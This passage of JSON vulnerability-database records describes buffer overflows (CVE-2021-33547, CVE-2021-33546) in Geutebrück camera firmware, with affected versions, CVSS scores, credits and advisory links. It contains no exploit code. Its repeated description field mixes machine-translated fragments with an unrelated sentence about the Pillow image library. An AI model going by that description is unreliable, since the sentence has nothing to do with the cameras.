"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33547"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33547"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33547",
"trust": 2.6
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33547",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"id": "VAR-202109-0600",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:36:43.383000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158070"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.7,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33547"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"date": "2021-09-13T18:15:22.420000",
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"date": "2021-09-27T14:30:58.053000",
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
VAR-202109-0599
Vulnerability from variot - Updated: 2025-01-30 19:58Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0599",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33546",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33546",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33546",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33546",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33546",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2091",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33546",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33546"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33546"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33546",
"trust": 2.6
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33546",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"id": "VAR-202109-0599",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T19:58:42.398000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158071"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.7,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33546"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33546"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2091"
},
{
"db": "NVD",
"id": "CVE-2021-33546"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
